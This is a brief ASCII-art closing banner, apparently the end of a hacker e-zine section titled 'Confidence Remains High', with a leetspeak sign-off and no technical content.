$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' w3 r00l, ph34r 0ur tekn33k